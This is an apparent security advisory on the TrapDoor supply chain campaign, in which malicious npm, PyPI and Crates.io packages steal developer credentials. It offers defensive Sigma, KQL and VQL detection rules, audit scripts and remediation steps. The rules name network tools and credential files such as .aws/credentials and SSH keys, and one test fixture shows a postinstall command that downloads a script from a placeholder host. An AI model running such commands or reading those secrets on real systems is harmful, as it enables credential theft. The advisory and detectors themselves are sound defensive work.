
TrapDoor Supply Chain Attack: Credential-Stealing Malware in npm, PyPI, and Crates.io

Security Arsenal Team
May 25, 2026

A sophisticated and coordinated supply chain attack, codenamed TrapDoor, has been actively targeting the developer ecosystem since May 22, 2026. This campaign is notable for its cross-ecosystem reach, simultaneously poisoning the npm, PyPI, and Crates.io repositories to distribute credential-stealing malware.

With over 34 malicious packages identified spanning more than 384 versions, the attackers are leveraging the trust inherent in open-source dependencies to compromise development environments. The primary objective is exfiltration of credentials, likely targeting cloud infrastructure keys, source code repository tokens, and internal system passwords. For SOC analysts and engineers, this represents a critical failure of the software supply chain, requiring immediate auditing of build pipelines and runtime environments.

Technical Analysis

Affected Platforms:

  • npm (Node.js): Malicious JavaScript packages.
  • PyPI (Python): Poisoned Python libraries.
  • Crates.io (Rust): Malicious Rust crates.

Attack Mechanics: The TrapDoor campaign relies on package typosquatting and dependency confusion techniques. Attackers publish packages with names strikingly similar to popular legitimate libraries or obscure names within the node_modules, site-packages, or cargo registry paths.

Upon installation (e.g., npm install, pip install), the malicious packages execute scripts during the install lifecycle (e.g., preinstall, postinstall, or setup.py).

  1. Execution: The payload typically decodes obfuscated scripts embedded in the package manifest.
  2. Reconnaissance: The malware scans the host machine for sensitive files, specifically targeting:
    • .aws/credentials and .aws/config
    • .npmrc tokens
    • SSH keys (id_rsa, id_ed25519)
    • .env files containing API keys
  3. Exfiltration: Stolen data is transmitted via HTTPS to attacker-controlled Command and Control (C2) infrastructure, often masquerading as legitimate telemetry or API requests to bypass egress filtering.
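
The install-lifecycle behaviour described above can be audited on disk before it runs again. The following is an added example, not code from the original article: it walks a `node_modules` tree, lists every package that declares a `preinstall`, `install`, or `postinstall` script, and flags commands that mention the credential files listed above or download/decode tooling. The marker regex, function names, and sample packages are assumptions constructed for illustration.

```python
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle hooks that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic markers (assumed): credential files named in the article, plus fetch/decode tools.
SUSPICIOUS = re.compile(
    r"\.aws[/\\](credentials|config)|\.npmrc|id_rsa|id_ed25519|\.env\b"
    r"|\b(curl|wget|certutil|base64|eval)\b", re.IGNORECASE)

def audit_node_modules(root):
    """Return (package, hook, command, flagged) for every install hook found."""
    findings = []
    for manifest in sorted(Path(root).rglob("package.json")):
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it
        scripts = meta.get("scripts") if isinstance(meta, dict) else None
        if not isinstance(scripts, dict):
            continue
        for hook in INSTALL_HOOKS:
            cmd = scripts.get(hook)
            if isinstance(cmd, str):
                name = meta.get("name", manifest.parent.name)
                findings.append((name, hook, cmd, bool(SUSPICIOUS.search(cmd))))
    return findings

def build_sample_tree(root):
    """Write constructed sample manifests (placeholder names) under root."""
    samples = {
        "example-flagged-pkg": {"postinstall": "curl -fsS https://example.invalid/s -o s.js"},
        "example-native-addon": {"install": "node-gyp rebuild"},
        "example-plain-lib": {"test": "jest"},
    }
    for name, scripts in samples.items():
        pkg = Path(root) / "node_modules" / name
        pkg.mkdir(parents=True)
        (pkg / "package.json").write_text(json.dumps({"name": name, "scripts": scripts}))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for name, hook, cmd, flagged in audit_node_modules(tmp):
            print("[!]" if flagged else "[ ]", name, hook, cmd)
```

Unflagged hooks are still worth reviewing: native add-ons legitimately use `install`, so the flag only prioritises the list.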

Exploitation Status:

  • Active Exploitation: Confirmed in-the-wild activity starting May 22, 2026.
  • CVE Status: No specific CVEs have been assigned for the malicious packages themselves as they are distinct artifacts rather than vulnerabilities in the package managers. However, this falls under the umbrella of CWE-829: Inclusion of Functionality from Untrusted Control Sphere.

Detection & Response

Detection of TrapDoor requires identifying anomalous behavior initiated by package managers or their child processes. The following rules focus on the execution of network utilities or shell commands by package installation processes, which is atypical for standard dependency installation.

**Sigma Rules**

```yaml
---
title: TrapDoor - Suspicious Child Process of Package Managers
id: 9a8b7c6d-5e4f-3a2b-1c0d-9e8f7a6b5c4d
status: experimental
description: Detects package managers (npm, pip, cargo) spawning shells or network tools, a common TTP in supply chain attacks like TrapDoor.
references:
  - https://thehackernews.com/2026/05/trapdoor-supply-chain-attack-spreads.html
author: Security Arsenal
date: 2026/05/23
tags:
  - attack.execution
  - attack.t1059.001
  - attack.initial_access
  - attack.t1195.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\npm.exe'
      - '\npm.cmd'
      - '\node.exe'
      - '\pip.exe'
      - '\pip3.exe'
      - '\python.exe'
      - '\cargo.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\bash.exe'
      - '\curl.exe'
      - '\wget.exe'
      - '\certutil.exe'
  condition: all of selection_*
falsepositives:
  - Legitimate build scripts that require post-install configuration (rare)
level: high
---
title: TrapDoor - Linux Package Manager Spawning Shell
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects npm, pip, or cargo on Linux spawning a shell or curl, indicative of malicious postinstall scripts.
references:
  - https://thehackernews.com/2026/05/trapdoor-supply-chain-attack-spreads.html
author: Security Arsenal
date: 2026/05/23
tags:
  - attack.execution
  - attack.t1059.004
  - attack.initial_access
  - attack.t1195.002
logsource:
  category: process_creation
  product: linux
detection:
  # Sigma's process_creation taxonomy uses Image / ParentImage (full paths).
  # The leading '/' anchors on the binary name so 'sh' does not also match 'ssh'.
  selection_parent:
    ParentImage|endswith:
      - '/npm'
      - '/pip'
      - '/pip3'
      - '/cargo'
  selection_child:
    Image|endswith:
      - '/sh'
      - '/bash'
      - '/curl'
      - '/wget'
      - '/python'
      - '/node'
  condition: all of selection_*
falsepositives:
  - Developer build scripts requiring environment setup
level: medium
---
title: TrapDoor - Credential File Access by Dev Tool
id: 2c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
status: experimental
description: Detects known package manager binaries accessing sensitive credential files on disk.
references:
  - https://thehackernews.com/2026/05/trapdoor-supply-chain-attack-spreads.html
author: Security Arsenal
date: 2026/05/23
tags:
  - attack.collection
  - attack.t1005
  - attack.credential_access
logsource:
  category: file_access
  product: windows
detection:
  selection:
    Image|endswith:
      - '\node.exe'
      - '\python.exe'
      - '\cargo.exe'
    TargetFilename|contains:
      - '\.aws\credentials'
      - '\.aws\config'
      - '\.npmrc'
      - '\.gitconfig'
  condition: selection
falsepositives:
  - Legitimate AWS SDK or Git configuration operations by the user
level: high
```


**KQL (Microsoft Sentinel / Defender)**

This query hunts for process creation events where package managers initiate suspicious child processes or network connections.

```kql
let PackageManagers = dynamic(["npm.exe", "node.exe", "pip.exe", "pip3.exe", "python.exe", "cargo.exe"]);
let SuspiciousTools = dynamic(["powershell.exe", "cmd.exe", "curl.exe", "wget.exe", "bash.exe"]);
// Each DeviceProcessEvents row already carries its parent (InitiatingProcess* columns),
// so the parent/child pairing needs no self-join.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ (PackageManagers)
| where FileName in~ (SuspiciousTools)
| project Timestamp, DeviceName, AccountName, ParentProcess=InitiatingProcessFileName, ChildProcess=FileName, ParentCommandLine=InitiatingProcessCommandLine, ChildCommandLine=ProcessCommandLine
```


**Velociraptor VQL**

Hunt for recent package installations that spawned shell processes or accessed hidden directories in user homes.

```vql
-- Hunt for package managers spawning suspicious shells.
-- VQL has no JOIN: collect candidate children first, then resolve each parent by Ppid.
LET Children = SELECT Ppid AS ChildPpid, Name AS ChildName,
       CommandLine AS ChildCmdline, CreateTime AS ChildStartTime
  FROM pslist()
  WHERE Name =~ "^(sh|bash|powershell|pwsh|curl|wget)$"
    AND CreateTime > timestamp(epoch=now() - 7 * 24 * 3600)  -- Last 7 days

SELECT * FROM foreach(row=Children, query={
  SELECT Pid AS ParentPid, Name AS ParentName, ChildName, ChildCmdline, ChildStartTime
  FROM pslist(pid=ChildPpid)
  WHERE Name =~ "^(npm|node|pip|pip3|python|python3|cargo)$"
})
```


**Remediation Script (Bash)**

This script audits common dependency directories for recent modifications matching the TrapDoor timeline and checks for known environment variable tampering.

```bash
#!/bin/bash

# TrapDoor Audit Script
# Lists package manifests modified since the start of the campaign in
# common dependency directories. Requires GNU find (-newermt).

echo "[*] Auditing for TrapDoor malicious packages..."

# Start of the campaign window
SINCE="2026-05-22"

# List manifests under a directory that were modified after $SINCE
audit_directory() {
    local dir="$1"
    if [ -d "$dir" ]; then
        echo "[+] Checking $dir for modifications since $SINCE..."
        find "$dir" -type f -newermt "$SINCE" \
            \( -name "package.json" -o -name "setup.py" -o -name "Cargo.toml" \) \
            -exec ls -la {} + 2>/dev/null
    fi
}

# Check user-local Python packages (glob is left unquoted so it expands
# to one directory per installed Python version)
for dir in "$HOME"/.local/lib/python*/site-packages; do
    audit_directory "$dir"
done

# Check the npm log directory
audit_directory "$HOME/.npm/_logs"
# Check global node_modules (common locations)
audit_directory "/usr/local/lib/node_modules"
audit_directory "$HOME/node_modules"

# Check Cargo registry
audit_directory "$HOME/.cargo/registry"

# Check for suspicious environment variables often used in these attacks
if [ -n "${NODE_OPTIONS:-}" ]; then
    echo "[!] WARNING: NODE_OPTIONS is set: $NODE_OPTIONS"
fi

echo "[*] Audit complete. Review findings for unknown or typosquatted packages."
```

Remediation

Immediate containment and remediation are required to prevent credential loss.

  1. Identify and Remove:

    • Review the full list of TrapDoor IOCs (once published by vendors) against your package-lock.json, yarn.lock, Pipfile, and Cargo.lock files.
    • Remove any identified malicious packages immediately.
    • Revert codebases to commits prior to May 22, 2026, if contamination is confirmed in the repository.
  2. Credential Rotation:

    • Assume Compromise: If these packages were executed in a build or dev environment, treat all credentials present during that time as compromised.
    • Rotate AWS Access Keys, GitHub Personal Access Tokens (PATs), SSH keys, and database credentials found on affected hosts.
  3. Patch and Harden:

    • Dependency Pinning: Ensure lockfiles are committed to version control and audited before merging.
    • Private Registries: Enforce the use of private npm/PyPI mirrors (e.g., Artifactory, Sonatype Nexus) that block packages failing security checks or typosquatting heuristics.
    • SCA Integration: Integrate Software Composition Analysis (SCA) tools into the CI/CD pipeline to block builds if new vulnerabilities or malicious packages are detected.
  4. Vendor Advisories:

    • Monitor official advisories from npm, PyPI, and Rust/Crates.io for specific package removals and checksums.
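
The lockfile review in step 1 can be scripted once an IOC list is available. The following is an added example, not code from the original article: it extracts resolved (name, version) pairs from `package-lock.json` (lockfileVersion 2 or 3) and `Cargo.lock` and reports those present in an IOC set. The article publishes no package names, so the IOC entries and sample lockfiles are constructed placeholders, and the function names are assumptions.

```python
import json
import re

# Constructed placeholder IOCs: the article lists no package names. Populate
# from registry advisories as {ecosystem: {package name: {bad versions}}}.
IOCS = {
    "npm": {"example-bad-pkg": {"1.0.3", "1.0.4"}},
    "crates": {"example-bad-crate": {"0.2.1"}},
}

def npm_lock_packages(text):
    """Yield (name, version) from package-lock.json (lockfileVersion 2 or 3)."""
    for path, meta in json.loads(text).get("packages", {}).items():
        if path and "version" in meta:  # skip the root entry and workspace links
            # Keys look like node_modules/a/node_modules/@scope/b; keep the last name.
            yield path.rsplit("node_modules/", 1)[-1], meta["version"]

def cargo_lock_packages(text):
    """Yield (name, version) from each [[package]] table in Cargo.lock."""
    for block in text.split("[[package]]")[1:]:
        name = re.search(r'^name = "([^"]+)"', block, re.M)
        version = re.search(r'^version = "([^"]+)"', block, re.M)
        if name and version:
            yield name.group(1), version.group(1)

PARSERS = {"npm": npm_lock_packages, "crates": cargo_lock_packages}

def match_iocs(ecosystem, lock_text, iocs=IOCS):
    """Return sorted (name, version) pairs that appear in the IOC set."""
    bad = iocs.get(ecosystem, {})
    return sorted((n, v) for n, v in PARSERS[ecosystem](lock_text)
                  if v in bad.get(n, ()))

# Constructed sample lockfiles (not real project data).
SAMPLE_NPM_LOCK = json.dumps({"lockfileVersion": 3, "packages": {
    "": {"name": "app", "version": "1.0.0"},
    "node_modules/express": {"version": "4.19.2"},
    "node_modules/express/node_modules/example-bad-pkg": {"version": "1.0.3"},
    "node_modules/@acme/example-bad-pkg": {"version": "1.0.3"},
}})
SAMPLE_CARGO_LOCK = (
    'version = 3\n\n'
    '[[package]]\nname = "serde"\nversion = "1.0.200"\n\n'
    '[[package]]\nname = "example-bad-crate"\nversion = "0.2.1"\n'
)

if __name__ == "__main__":
    print("npm:", match_iocs("npm", SAMPLE_NPM_LOCK))
    print("crates:", match_iocs("crates", SAMPLE_CARGO_LOCK))
```

Matching on the lockfile catches transitive dependencies that never appear in `package.json` or `Cargo.toml`; the scoped `@acme/example-bad-pkg` entry is not reported because its full name differs from the IOC.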
